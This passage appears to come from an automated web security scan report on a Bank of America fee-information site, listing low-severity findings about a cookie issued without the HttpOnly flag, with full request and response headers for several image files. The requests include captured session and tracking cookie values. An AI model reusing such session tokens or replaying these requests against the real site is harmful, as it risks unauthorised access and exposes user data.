ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1c7-2b-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:00 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

GIF89a.............!.......,...........D..;

4.45. http://factsaboutfees.bankofamerica.com/assets/img/tabActive_1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/tabActive_1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/tabActive_1.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c217-d36-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 3382
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:28 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

GIF89aZ......ggg.........(x..........................................................^.......................5...........P........C........]........zzz...ppp..............................k............
...[SNIP]...

4.46. http://factsaboutfees.bankofamerica.com/assets/img/title_tagline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/title_tagline.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/title_tagline.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1ef-802-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 2050
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:00 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

GIF89a..........................7M.Ug.ct....y..EY....(?..2..............................................................................................................................................
...[SNIP]...

4.47. http://factsaboutfees.bankofamerica.com/assets/img/volume_control/closed_button.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/volume_control/closed_button.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/volume_control/closed_button.png HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:02 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:58 GMT
ETag: "24c2a3-2bb-4ab460cd21e80"
Accept-Ranges: bytes
Content-Length: 699
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:02 GMT
Content-Type: image/png
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

.PNG
.
...IHDR.............l......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...9IDATHK..Mk.Q...&B...t.....5k.....w.F7...\[W ".7...p#4...*~D..E..T...{z.m.`...@..0_g.g....
...[SNIP]...

4.48. http://factsaboutfees.bankofamerica.com/assets/img/volume_control/scrollerThumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/volume_control/scrollerThumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/volume_control/scrollerThumb.png HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:30 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c29e-13a-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 314
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:30 GMT
Content-Type: image/png
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:31 GMT;path=/

.PNG
.
...IHDR.....................IDAT(....J.P..g..{....P.B..H......]....#...-X.$..)......{.t\...lr...-.s....#....v..S..H.X[...Vm.u....m.^O...:....`.Q..2......n{...Lf......k.....B......+.N.Isy(...
...[SNIP]...

4.49. http://factsaboutfees.bankofamerica.com/assets/img/volume_control/video_off.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/volume_control/video_off.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/volume_control/video_off.png HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:02 GMT
Server: Apache
